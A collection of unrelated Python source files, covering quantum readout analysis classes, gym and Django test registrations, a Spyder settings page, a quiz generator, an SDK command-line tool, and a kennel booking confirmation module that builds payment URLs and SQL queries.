self.timestamps = [self.timestamp]
self.raw_data_dict['timestamps'] = [self.timestamp]
self.raw_data_dict['datetime'] = np.array([dateobj], dtype=datetime.datetime)
temp = data_file.load_hdf5data()
data_file.get_naming_and_values()
self.raw_data_dict['scaling_amp'] = data_file.sweep_points
self.raw_data_dict['dephasing'] = np.array(data_file.measured_values[0], dtype=float)
self.wrap_phase=self.options_dict.get('wrap_phase',0)
phase_raw=np.array(data_file.measured_values[1], dtype=float)
self.raw_data_dict['phase'] = (phase_raw+self.wrap_phase)%360-self.wrap_phase
self.raw_data_dict['folder'] = data_file.folder
class DephasingAnalysisSingleScans(DephasingAnalysis):
'''
Gathers/Loads data from a range of single coherence/dephasing scans (e.g. Ramsey)
and analyses it (see DephasingAnalysis).
options_dict options:
- Inherited option from DephasingAnalysis
- scaling_amp_key_dephasing (string) - key of the scaling amp in the hdf5 file
e.g. 'Instrument settings.RO_lutman.M_amp_R0'
- dephasing_amplitude_key (string) - key of the coherence amp in the hdf5 file
e.g. 'Analysis.Fitted Params lin_trans w0.amplitude.value'
- dephasing_phase_key: (string) - key of the coherence phase in the hdf5 file
e.g. 'Analysis.Fitted Params lin_trans w0.phase.value'
'''
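# Illustrative sketch of overriding one of the hdf5 keys documented above
# (the alternative key name is a made-up example):
#
#     DephasingAnalysisSingleScans(
#         t_start='20180101_000000', t_stop='20180101_235959',
#         options_dict={'dephasing_phase_key':
#                       'Analysis.Fitted Params w0.phase.value'})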
def __init__(self, t_start: str = None, t_stop: str = None, label: str = '_dephasing',
options_dict: dict = None, extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only
)
sa = self.options_dict.get('scaling_amp_key_dephasing', 'Instrument settings.RO_lutman.M_amp_R0')
rak = self.options_dict.get('dephasing_amplitude_key', 'Analysis.Fitted Params lin_trans w0.amplitude.value')
rap = self.options_dict.get('dephasing_phase_key', 'Analysis.Fitted Params lin_trans w0.phase.value')
self.params_dict = {'scaling_amp': sa,
'dephasing': rak,
'phase': rap,
}
self.numeric_params = ['scaling_amp', 'dephasing', 'phase']
if auto:
self.run_analysis()
def extract_data(self):
# Load data
super().extract_data()
#todo: we need an option to remove outliers and the reference point
# Set output paths
youngest = np.max(self.raw_data_dict['datetime'])
youngest += datetime.timedelta(seconds=1)
f = '%s_amp_sweep_dephasing' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
class SSROAnalysis(ba.BaseDataAnalysis):
def process_data(self):
# Remove None entries
snr = np.array(self.raw_data_dict['SNR'], dtype=float)
amps = np.array(self.raw_data_dict['scaling_amp'], dtype=float)
mask = np.intersect1d(np.where(snr != None), np.where(amps != None))
self.proc_data_dict['scaling_amp'] = amps[mask]
self.proc_data_dict['SNR'] = snr[mask]
self.proc_data_dict['F_a'] = np.array(self.raw_data_dict['F_a'], dtype=float)[mask]
self.proc_data_dict['F_d'] = np.array(self.raw_data_dict['F_d'], dtype=float)[mask]
# Fitting masks
mask = range(0, len(amps))
inv_mask = []
if self.options_dict.get('amp_threshold', False):
mask = np.where(amps < self.options_dict['amp_threshold'])
inv_mask = np.where(amps >= self.options_dict['amp_threshold'])
self.proc_data_dict['fitting_mask'] = mask
self.proc_data_dict['fitting_mask_inv'] = inv_mask
def prepare_fitting(self):
self.fit_dicts = OrderedDict()
SNR = self.proc_data_dict['SNR']
amps = self.proc_data_dict['scaling_amp']
mask = self.proc_data_dict['fitting_mask']
amps = amps[mask]
SNR = SNR[mask]
def line(x, a):
return a * x
gmodel = lmfit.models.Model(line)
gmodel.set_param_hint('a', value=1, min=1e-5, max=100)
para = gmodel.make_params()
self.fit_dicts['snr_fit'] = {
'model': gmodel,
'fit_xvals': {'x': amps},
'fit_yvals': {'data': SNR},
'guess_pars': para,
}
def prepare_plots(self):
t = self.timestamps[0]
amps = self.proc_data_dict['scaling_amp']
name = ''
self.plot_dicts[name + 'amp_vs_SNR_fit'] = {
'title' : t,
'plotfn': self.plot_fit,
'ax_id': name + 'amp_vs_SNR',
'zorder': 5,
'fit_res': self.fit_res['snr_fit'],
'xvals': self.proc_data_dict['scaling_amp'],
'marker': '',
'linestyle': '-',
'setlabel': 'SNR fit',
'do_legend': True,
'color': 'blue',
}
fit_mask = self.proc_data_dict['fitting_mask']
fit_mask_inv = self.proc_data_dict['fitting_mask_inv']
use_ext = len(fit_mask) > 0 and len(fit_mask_inv) > 0
if len(fit_mask) > 0:
label = 'SNR data'
if use_ext:
label += ' (used in fitting)'
self.plot_dicts[name + 'amp_vs_SNR_scatter_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': name + 'amp_vs_SNR',
'zorder': 0,
'xvals': amps[fit_mask],
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'yvals': self.proc_data_dict['SNR'][fit_mask],
'ylabel': 'SNR',
'yunit': '-',
'marker': 'o',
'linestyle': '',
'setlabel': label,
'do_legend': True,
'color': 'blue',
}
if len(fit_mask_inv) > 0:
label = 'SNR data'
if use_ext:
label += ' (not fitted)'
self.plot_dicts[name + 'amp_vs_SNR_scatter_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': name + 'amp_vs_SNR',
'zorder': 0,
'xvals': amps[fit_mask_inv],
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'yvals': self.proc_data_dict['SNR'][fit_mask_inv],
'ylabel': 'SNR',
'yunit': '-',
'marker': 'x',
'linestyle': '',
'setlabel': label,
'do_legend': True,
'color': 'blue',
}
self.plot_dicts[name + 'amp_vs_Fa'] = {
'title' : t,
'plotfn': self.plot_line,
'zorder': 0,
'ax_id': name + 'amp_vs_F',
'xvals': amps,
'yvals': self.proc_data_dict['F_a'],
'marker': 'x',
'linestyle': '',
'setlabel': '$F_a$ data',
'do_legend': True,
}
self.plot_dicts[name + 'amp_vs_Fd'] = {
'title' : t,
'plotfn': self.plot_line,
'zorder': 1,
'ax_id': name + 'amp_vs_F',
'xvals': amps,
'yvals': self.proc_data_dict['F_d'],
'marker': 'x',
'linestyle': '',
'ylabel': 'Fidelity',
'yunit': '-',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': '$F_d$ data',
'do_legend': True,
}
class SSROAnalysisSweep(SSROAnalysis):
def __init__(self, t_start: str = None, t_stop: str = None,
label: str = '_ro_amp_sweep_SNR',
options_dict: dict = None, extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_start,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
self.single_timestamp = True
ts = a_tools.get_timestamps_in_range(timestamp_start=t_start,
timestamp_end=t_stop,
label=label,
exact_label_match=True)
if self.verbose:
print('SSROAnalysisSweep', ts)
assert len(ts) == 1, 'Expected a single match, found %d'%len(ts)
self.timestamp = ts[0]
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
data_file = MeasurementAnalysis(timestamp=self.timestamp,
auto=True, TwoD=False)
dateobj = a_tools.datetime_from_timestamp(self.timestamp)
self.timestamps = [self.timestamp]
self.raw_data_dict['timestamps'] = [self.timestamp]
self.raw_data_dict['datetime'] = np.array([dateobj], dtype=datetime.datetime)
temp = data_file.load_hdf5data()
data_file.get_naming_and_values()
self.raw_data_dict['scaling_amp'] = data_file.sweep_points
self.raw_data_dict['SNR'] = np.array(data_file.measured_values[0], dtype=float)
self.raw_data_dict['F_d'] = np.array(data_file.measured_values[1], dtype=float)
self.raw_data_dict['F_a'] = np.array(data_file.measured_values[2], dtype=float)
self.raw_data_dict['folder'] = data_file.folder
class SSROAnalysisSingleScans(SSROAnalysis):
def __init__(self, t_start: str = None, t_stop: str = None,
label: str = '_SSRO', options_dict: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
sa = self.options_dict.get('scaling_amp_key_ssro',
'Instrument settings.RO_lutman.M_amp_R0')
self.params_dict = {'scaling_amp': sa,
'SNR': 'Analysis.SSRO_Fidelity.SNR',
'F_a': 'Analysis.SSRO_Fidelity.F_a',
'F_d': 'Analysis.SSRO_Fidelity.F_d',
}
self.numeric_params = ['scaling_amp', 'SNR', 'F_a', 'F_d']
if auto:
self.run_analysis()
def extract_data(self):
# Load data
super().extract_data()
#todo: we need an option to remove outliers and the reference point
# Set output paths
youngest = np.max(self.raw_data_dict['datetime'])
youngest += datetime.timedelta(seconds=1)
f = '%s_amp_sweep_SNR_optimized' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
|
from gym.envs.registration import register
register(
id='reacher_custom-v0',
entry_point='reacher.envs:ReacherCustomEnv',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-action1-v0',
entry_point='reacher.envs:ReacherCustomAction1Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-action2-v0',
entry_point='reacher.envs:ReacherCustomAction2Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-raction1-v0',
entry_point='reacher.envs:ReacherCustomRAction1Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-raction2-v0',
entry_point='reacher.envs:ReacherCustomRAction2Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
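# Usage sketch (assumes the package that registers these environments is
# importable as `reacher`, matching the entry_point module paths above;
# importing it triggers the register() calls):
#
#     import gym
#     import reacher  # noqa: F401
#     env = gym.make('reacher_custom-v0')
#     obs = env.reset()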
|
from pathlib import Path
TESTS_DATA_PATH = Path(__file__).parent / 'data'
# These are the last 6 digits in the second line in the ".log" files:
EXPECTED_ACQ_TIME = 143828
|
from django.db import models
import secretballot
class Link(models.Model):
url = models.URLField()
secretballot.enable_voting_on(Link)
# used for testing field renames
class WeirdLink(models.Model):
url = models.URLField()
secretballot.enable_voting_on(WeirdLink,
votes_name='vs',
upvotes_name='total_upvs',
downvotes_name='total_downvs',
total_name='v_total',
add_vote_name='add_v',
remove_vote_name='remove_v',
)
# TODO?: base_manager?
# Used for testing custom manager_name
class AnotherLink(models.Model):
url = models.URLField()
secretballot.enable_voting_on(AnotherLink,
manager_name='ballot_custom_manager'
)
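# Illustrative sketch of the renamed voting API (attribute names follow the
# enable_voting_on() keyword arguments above; the token value is made up):
#
#     link = WeirdLink.objects.create(url='http://example.com')
#     link.add_v('some-token', 1)     # renamed add_vote
#     link.total_upvs                 # renamed total_upvotes
#     AnotherLink.ballot_custom_manager.all()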
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Run configuration page."""
# Third party imports
from qtpy.QtWidgets import (QButtonGroup, QGroupBox, QHBoxLayout, QLabel,
QVBoxLayout)
# Local imports
from spyder.api.preferences import PluginConfigPage
from spyder.api.translations import get_translation
from spyder.plugins.run.widgets import (ALWAYS_OPEN_FIRST_RUN,
ALWAYS_OPEN_FIRST_RUN_OPTION,
CLEAR_ALL_VARIABLES,
CONSOLE_NAMESPACE,
CURRENT_INTERPRETER,
CURRENT_INTERPRETER_OPTION, CW_DIR,
DEDICATED_INTERPRETER,
DEDICATED_INTERPRETER_OPTION,
FILE_DIR, FIXED_DIR, INTERACT,
POST_MORTEM, SYSTERM_INTERPRETER,
SYSTERM_INTERPRETER_OPTION,
WDIR_FIXED_DIR_OPTION,
WDIR_USE_CWD_DIR_OPTION,
WDIR_USE_FIXED_DIR_OPTION,
WDIR_USE_SCRIPT_DIR_OPTION)
from spyder.utils.misc import getcwd_or_home
# Localization
_ = get_translation("spyder")
class RunConfigPage(PluginConfigPage):
"""Default Run Settings configuration page."""
def setup_page(self):
about_label = QLabel(_("The following are the default options for "
"running files.These options may be overriden "
"using the <b>Configuration per file</b> entry "
"of the <b>Run</b> menu."))
about_label.setWordWrap(True)
interpreter_group = QGroupBox(_("Console"))
interpreter_bg = QButtonGroup(interpreter_group)
self.current_radio = self.create_radiobutton(
CURRENT_INTERPRETER,
CURRENT_INTERPRETER_OPTION,
True,
button_group=interpreter_bg)
self.dedicated_radio = self.create_radiobutton(
DEDICATED_INTERPRETER,
DEDICATED_INTERPRETER_OPTION,
False,
button_group=interpreter_bg)
self.systerm_radio = self.create_radiobutton(
SYSTERM_INTERPRETER,
SYSTERM_INTERPRETER_OPTION, False,
button_group=interpreter_bg)
interpreter_layout = QVBoxLayout()
interpreter_group.setLayout(interpreter_layout)
interpreter_layout.addWidget(self.current_radio)
interpreter_layout.addWidget(self.dedicated_radio)
interpreter_layout.addWidget(self.systerm_radio)
general_group = QGroupBox(_("General settings"))
post_mortem = self.create_checkbox(POST_MORTEM, 'post_mortem', False)
clear_variables = self.create_checkbox(CLEAR_ALL_VARIABLES,
'clear_namespace', False)
console_namespace = self.create_checkbox(CONSOLE_NAMESPACE,
'console_namespace', False)
general_layout = QVBoxLayout()
general_layout.addWidget(clear_variables)
general_layout.addWidget(console_namespace)
general_layout.addWidget(post_mortem)
general_group.setLayout(general_layout)
wdir_group = QGroupBox(_("Working directory settings"))
wdir_bg = QButtonGroup(wdir_group)
wdir_label = QLabel(_("Default working directory is:"))
wdir_label.setWordWrap(True)
dirname_radio = self.create_radiobutton(
FILE_DIR,
WDIR_USE_SCRIPT_DIR_OPTION,
True,
button_group=wdir_bg)
cwd_radio = self.create_radiobutton(
CW_DIR,
WDIR_USE_CWD_DIR_OPTION,
False,
button_group=wdir_bg)
thisdir_radio = self.create_radiobutton(
FIXED_DIR,
WDIR_USE_FIXED_DIR_OPTION,
False,
button_group=wdir_bg)
thisdir_bd = self.create_browsedir("", WDIR_FIXED_DIR_OPTION,
getcwd_or_home())
thisdir_radio.toggled.connect(thisdir_bd.setEnabled)
dirname_radio.toggled.connect(thisdir_bd.setDisabled)
cwd_radio.toggled.connect(thisdir_bd.setDisabled)
thisdir_layout = QHBoxLayout()
thisdir_layout.addWidget(thisdir_radio)
thisdir_layout.addWidget(thisdir_bd)
wdir_layout = QVBoxLayout()
wdir_layout.addWidget(wdir_label)
wdir_layout.addWidget(dirname_radio)
wdir_layout.addWidget(cwd_radio)
wdir_layout.addLayout(thisdir_layout)
wdir_group.setLayout(wdir_layout)
external_group = QGroupBox(_("External system terminal"))
interact_after = self.create_checkbox(INTERACT, 'interact', False)
external_layout = QVBoxLayout()
external_layout.addWidget(interact_after)
external_group.setLayout(external_layout)
firstrun_cb = self.create_checkbox(
ALWAYS_OPEN_FIRST_RUN % _("Run Settings dialog"),
ALWAYS_OPEN_FIRST_RUN_OPTION,
False)
vlayout = QVBoxLayout()
vlayout.addWidget(about_label)
vlayout.addSpacing(10)
vlayout.addWidget(interpreter_group)
vlayout.addWidget(general_group)
vlayout.addWidget(wdir_group)
vlayout.addWidget(external_group)
vlayout.addWidget(firstrun_cb)
vlayout.addStretch(1)
self.setLayout(vlayout)
def apply_settings(self, options):
pass
|
from random import shuffle
from typing import List
from rest_framework.exceptions import APIException
from data.word_pairs import WORD_PAIRS
from game.constants import QUESTIONS_PER_GAME, ANSWERS_PER_QUESTION
from game.game_utils import GameUtils
from game.models import Question, Game
def create_word_questions(game: Game) -> List[Question]:
check_language_pairs_number()
questions = []
for _ in range(QUESTIONS_PER_GAME):
questions.append(get_question_to_create(game, questions))
return questions
def check_language_pairs_number():
min_number_of_pairs = max(ANSWERS_PER_QUESTION, QUESTIONS_PER_GAME)
if len(WORD_PAIRS) < min_number_of_pairs:
raise APIException(
f"Must have at least {min_number_of_pairs} language pairs to "
"create a game"
)
def get_random_language_pair() -> dict:
index = GameUtils.get_random_int(0, len(WORD_PAIRS) - 1)
return WORD_PAIRS[index]
def get_question_to_create(
game: Game, existing_questions: List[Question]
) -> Question:
while True:
question_pair = get_random_language_pair()
existing_question_words = [
question.question for question in existing_questions
]
new_question_word = question_pair["english_word"]
if new_question_word not in existing_question_words:
answer_words = get_question_answers(question_pair)
return Question(
game=game,
question=new_question_word,
correct_answer=question_pair["russian_word"],
answer_words=answer_words,
)
def get_question_answers(question_pair: dict) -> List[str]:
answers = [question_pair["russian_word"]]
for _ in range(ANSWERS_PER_QUESTION - 1):
answers.append(get_wrong_answer(answers))
shuffle(answers)
return answers
def get_wrong_answer(existing_answers: List[str]) -> str:
while True:
random_language_pair = get_random_language_pair()
if random_language_pair["russian_word"] not in existing_answers:
return random_language_pair["russian_word"]
|
from PyQt5.QtWidgets import QListWidgetItem
class InputItem(QListWidgetItem):
pass
|
# Copyright 2021 Zuva Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .config import config
from .ZDAISDK import ZDAISDK
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--get",
type = str,
choices = ["url", "token"],
help = 'Returns the default url or token used by the wrapper')
parser.add_argument("--set-token",
type = str,
help = 'Sets the default token')
parser.add_argument("--set-url",
type = str,
help = 'Sets the default url')
parser.add_argument("--test",
type = str,
choices = ["connection"],
help = 'Perform a test action')
args = parser.parse_args()
if __name__ == "__main__":
config.create_wrapper_config()
url, token = config.get_access()
if args.get == "token":
if not token:
print(f'No default token found')
else:
print(token)
elif args.get == "url":
if not url:
print(f'No default url found')
else:
print(url)
elif args.set_token:
config.update_wrapper_config(token = args.set_token)
print('Token set')
elif args.set_url:
config.update_wrapper_config(url = args.set_url)
print('Url set')
elif args.test == 'connection':
if any(f == "" for f in [url, token]):
print(f'Unable to perform connection test using default values: either url or token missing.')
exit(1)
sdk = ZDAISDK(from_config = True)
try:
fields, _ = sdk.fields.get()
print(f'Connection test succeeded [Retrieved {len(fields)} fields]')
except Exception as e:
print(f'Connection test failed: {e}')
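# Example invocations (a sketch; the module path used to run this file depends
# on how the package is installed and is an assumption here):
#
#     python -m <package> --set-url <url>
#     python -m <package> --set-token <token>
#     python -m <package> --get url
#     python -m <package> --test connection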
|
# -*- coding: utf-8 -*-
#===============================================================================
# Author : J.Chapman
# License : BSD
# Date : 4 August 2013
# Description : Python 3 REST server
#===============================================================================
from DefaultHTTPServer import DefaultHTTPServer
from RESTfulHTTPRequestHandler import RESTfulHTTPRequestHandler
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console and file handlers and set log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s %(threadName)s %(filename)s %(lineno)d [%(levelname)s] : %(funcName)s : %(message)s')
# set formatter for console and file handlers
ch.setFormatter(formatter)
# add console and file handlers to logger
logger.addHandler(ch)
logging.getLogger("DefaultHTTPServer").addHandler(ch)
logging.getLogger("DefaultHTTPRequestHandler").addHandler(ch)
logging.getLogger("RESTfulHTTPRequestHandler").addHandler(ch)
def main():
"""
main program function
"""
SERVER_IP = "0.0.0.0"
SERVER_PORT = 8080
server = DefaultHTTPServer((SERVER_IP, SERVER_PORT), RESTfulHTTPRequestHandler)
print("Starting server, use <Ctrl-C> to stop")
server.serve_forever()
if __name__ == '__main__':
main()
|
from typing import List
def to_header_payload(headers) -> List[dict]:
return [
{'key': key, 'value': value, 'include': True}
for key, value in headers.items()
]
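# Usage sketch (follows directly from the code above):
#     to_header_payload({'Accept': 'application/json'})
#     -> [{'key': 'Accept', 'value': 'application/json', 'include': True}]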
|
"""Cache functions and configuration for styles."""
import re
from datetime import timedelta
from typing import Tuple
from loguru import logger
from nitpick.enums import CachingEnum
REGEX_CACHE_UNIT = re.compile(r"(?P<number>\d+)\s+(?P<unit>(minute|hour|day|week))", re.IGNORECASE)
def parse_cache_option(cache_option: str) -> Tuple[CachingEnum, timedelta]:
"""Parse the cache option provided on pyproject.toml.
If no cache option is provided, or it is invalid, the default is *one hour*.
"""
clean_cache_option = cache_option.strip().lower() if cache_option else ""
mapping = {CachingEnum.NEVER.name.lower(): CachingEnum.NEVER, CachingEnum.FOREVER.name.lower(): CachingEnum.FOREVER}
simple_cache = mapping.get(clean_cache_option)
if simple_cache:
logger.info(f"Simple cache option: {simple_cache.name}")
return simple_cache, timedelta()
default = CachingEnum.EXPIRES, timedelta(hours=1)
if not clean_cache_option:
return default
for match in REGEX_CACHE_UNIT.finditer(clean_cache_option):
plural_unit = match.group("unit") + "s"
number = int(match.group("number"))
logger.info(f"Cache option with unit: {number} {plural_unit}")
return CachingEnum.EXPIRES, timedelta(**{plural_unit: number})
logger.warning(f"Invalid cache option: {clean_cache_option}. Defaulting to 1 hour")
return default
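# Behaviour sketch (follows from the parsing code above):
#     parse_cache_option("never")    -> (CachingEnum.NEVER, timedelta())
#     parse_cache_option("3 hours")  -> (CachingEnum.EXPIRES, timedelta(hours=3))
#     parse_cache_option("")         -> (CachingEnum.EXPIRES, timedelta(hours=1))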
|
from os import getenv, path
from .settings import get_settings
from base64 import b64encode
from datetime import datetime, date
from decimal import Decimal
import time
from .env import log, clean_html
from urllib.request import quote
from mako.template import Template
import webbrowser
class ArgsWrapper():
def __init__(self, dict):
self.dict = dict
def __getattr__(self, attr):
if attr in self.dict:
return self.dict[attr]
else:
return None
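# Usage sketch: ArgsWrapper mimics an argparse.Namespace backed by a plain
# dict; missing keys come back as None.
#
#     args = ArgsWrapper({'deposit': '30.00'})
#     args.deposit   -> '30.00'
#     args.payment   -> None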
def handle_remote_confirmation(data):
code = 1
error_message = ''
try:
bk_no = data['bk_no']
deposit_requested = 'deposit_amount' in data
deposit_amount = 0.0
if deposit_requested:
deposit_amount = data['deposit_amount']
body = data['body']
file_name = data['file_name']
subject = data['subject']
destination = data['email']
fout = f'Z:/Kennels/Confirmations/{file_name}'
f = open(fout, 'w')
f.write(body)
f.close()
handle_confirmation(bk_no, deposit_amount, subject, fout, 0,
destination)
except Exception as e:
code = 0
error_message = str(e)
return code, error_message
def confirm_all(
petadmin, report_parameters, action, asofdate=None,
audit_start=0, additional_text='', forced_subject=''
):
confirmation_candidates = {}
conf_time = datetime.now()
env = petadmin.env
cursor = env.get_cursor()
# start by adding booking fees as necessary
sql = 'Execute padd_booking_fee_new'
env.execute(sql)
petadmin.load()
# next read all past emails sent, to safeguard against double-sending
sql = """
select hist_bk_no, hist_date, hist_destination, hist_subject
from vwhistory2
where hist_report = 'Conf-mail' and hist_type = 'Email Client'
"""
try:
cursor.execute(sql)
except Exception as e:
log.exception(f"Exception executing '{sql}': {str(e)}")
return
past_messages = {}
for row in cursor:
bk_no = row[0]
hist_date = row[1]
destination = row[2]
subject = row[3]
if bk_no not in past_messages:
past_messages[bk_no] = []
past_messages[bk_no].append((hist_date, destination, subject))
if asofdate:
sql = f"""
select a.bk_no, aud_type, aud_action, aud_amount, aud_date,
aud_booking_count, aud_confirm from vwaudit a
join vwbooking b on a.bk_no = b.bk_no
where b.bk_start_date > GETDATE() and
aud_date >= '{asofdate}' order by b.bk_start_date
"""
elif audit_start > 0:
sql = """
select b.bk_no, aud_type, aud_action, aud_amount, aud_date,
aud_booking_count, aud_confirm from vwaudit_orphan a
join vwbooking b on a.aud_key = b.bk_no
where b.bk_start_date > GETDATE() and aud_date >= '{audit_start}'
order by b.bk_start_date
"""
else:
sql = """
select a.bk_no, aud_type, aud_action, aud_amount, aud_date,
aud_booking_count, aud_confirm
from vwrecentaudit a
join vwbooking b on a.bk_no = b.bk_no
where b.bk_start_date > GETDATE()
order by b.bk_start_date
"""
try:
cursor.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
rows = cursor.fetchall()
for row in rows:
bk_no = row[0]
aud_type = row[1]
aud_action = row[2]
aud_amount = row[3]
aud_date = row[4]
aud_booking_count = row[5]
aud_confirm = row[6]
env.set_key(bk_no, 'B')
log.debug(
f'Processing audit event for booking {bk_no}, type {aud_type}'
f', action {aud_action}'
)
if not aud_confirm:
log.info('Skipping bk_no %d - no confirmation memo' % bk_no)
continue
if bk_no in confirmation_candidates:
cc = confirmation_candidates[bk_no]
else:
cc = ConfirmationCandidate(petadmin, bk_no)
cc.additional_text = additional_text
cc.forced_subject = forced_subject
if not cc.booking:
log.error('Missing booking for bk_no = %d' % bk_no)
continue
if cc.booking.status == 'S':
log.info(
f'Skipping booking #{bk_no} '
f'- status is {cc.booking.status}'
)
continue
if bk_no in past_messages:
cc.past_messages = past_messages[bk_no]
confirmation_candidates[bk_no] = cc
cc.booking = petadmin.bookings.get(bk_no)
cc.add_event(aud_type, aud_action, aud_amount, aud_date)
cc.booking_count = aud_booking_count
env.clear_key()
log.info('Confirming %d candidates', len(confirmation_candidates))
if len(confirmation_candidates) > 0:
conf_time_str = conf_time.strftime('%Y%m%d %H:%M:%S')
sql = (f"Insert into tblconfirm (conf_time, conf_candidates) values"
f"('{conf_time_str}', {len(confirmation_candidates)})")
try:
env.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
sql = 'Select @@Identity'
try:
cursor.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
row = cursor.fetchone()
conf_no = row[0]
log.debug(
f'Created confirmation record #{conf_no} with'
f' {len(confirmation_candidates)} candidates')
successfuls = 0
for cc in confirmation_candidates.values():
env.set_key(cc.booking.no, 'B')
log.debug('Processing confirmation candidate')
cc.conf_no = conf_no
try:
cc.generate_confirmation(report_parameters, action)
log.debug('Generate confirmation completed successfully')
successfuls += 1
except Exception as e:
log.exception(
f'Exception when generating confirmation for booking '
f'{cc.booking.no}: {e}')
env.clear_key()
sql = (
f'Update tblconfirm set conf_successfuls = {successfuls}'
f' where conf_no = {conf_no}')
env.execute(sql)
sql = 'Execute pmaintenance'
try:
env.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
def process_booking(bk_no, args, pa, action, rp, additional_text='',
forced_subject=''):
cc = ConfirmationCandidate(pa, bk_no)
cc.additional_text = additional_text
cc.forced_subject = forced_subject
if args.confirmed:
cc.booking.status = 'V'
if args.deposit is not None:
cc.force_deposit = True
cc.deposit_amount = Decimal(args.deposit)
if args.payment is not None:
cc.payment = True
cc.payment_amount = Decimal(args.payment)
if args.amended:
cc.amended = True
if args.cancel:
cc.cancelled = True
if args.deluxe:
cc.deluxe = True
cc.skip = False
return cc.generate_confirmation(rp, action)
def handle_confirmation(
env, bk_no, deposit_amount, subject, file_name,
conf_no=0, email=''):
sql = f"Execute pinsert_confaction {conf_no}, {bk_no}, '', '{subject}'" \
f", '{file_name}', {deposit_amount}, '{email}'"
env.execute(sql)
class ReportParameters:
def __init__(self, env):
self.report = path.join(env.image_folder, "Confirmation.html")
self.report_txt = path.join(env.image_folder, "Confirmation.txt")
self.provisional_report = \
path.join(env.image_folder, "PreBooking.html")
self.provisional_report_txt = \
path.join(env.image_folder, "PreBooking.txt")
self.logo_file = path.join(env.image_folder, "Logo.jpg")
self.deluxe_logo_file = \
path.join(env.image_folder, "deluxe_logo_2.png")
self.pay_deposit_file = path.join(env.image_folder, "paydeposit.png")
self.logo_code = None
self.deluxe_logo_code = None
self.deposit_icon = None
self.past_messages = []
# def read_images(self):
# with open(self.logo_file, "rb") as f:
# data = f.read()
# self.logo_code = b64encode(data)
# with open(self.deluxe_logo_file, "rb") as f:
# data = f.read()
# self.deluxe_logo_code = b64encode(data)
# with open(self.pay_deposit_file, "rb") as f:
# data = f.read()
# self.deposit_icon = b64encode(data)
@staticmethod
def get_deposit_url(bk_no, deposit_amount, pet_names, customer, expiry=0):
timestamp = time.mktime(
datetime.combine(date.today(), datetime.min.time()).timetuple())
timestamp += expiry * 24 * 3600
timestamp *= 1000
url = (
"https://secure.worldpay.com/wcc/purchase?instId=1094566&"
f"cartId=PBL-{bk_no}&amount={deposit_amount}¤cy=GBP&")
url += (
f'desc=Deposit+for+Crowbank+booking+%%23{bk_no}+'
f'for+{quote(pet_names)}&accId1=CROWBANKPETBM1&testMode=0')
url += f'&name={quote(customer.display_name())}'
if customer.email != '':
url += f'&email={quote(customer.email)}'
if customer.addr1 != '':
url += f'&address1={quote(customer.addr1)}'
if customer.addr2 != '':
url += f'&address2={quote(customer.addr2)}'
if customer.addr3 != '':
url += f'&town={quote(customer.addr3)}'
if customer.postcode != '':
url += f'&postcode={quote(customer.postcode)}'
url += '&country=UK'
if expiry:
url += f'`{timestamp}'
if customer.telno_home != '':
phone = customer.telno_home
if len(phone) == 6:
phone = '01236 ' + phone
url += '&tel=%s' % quote(phone)
return url
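# --- Hedged usage sketch (not part of the original module) ------------------
# Illustrates how get_deposit_url could be called. 'demo_customer' and all
# literal values below are invented for illustration and only mimic the
# attributes the method actually reads (display_name(), email, addr1-3,
# postcode, telno_home); the real Customer class may differ.
def _example_deposit_url():
    from types import SimpleNamespace
    demo_customer = SimpleNamespace(
        display_name=lambda: 'Jane Example',
        email='jane@example.com',
        addr1='1 High Street', addr2='', addr3='Exampletown',
        postcode='G1 1AA', telno_home='123456')
    return ReportParameters.get_deposit_url(
        12345, Decimal('50.00'), 'Rex', demo_customer, expiry=7)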
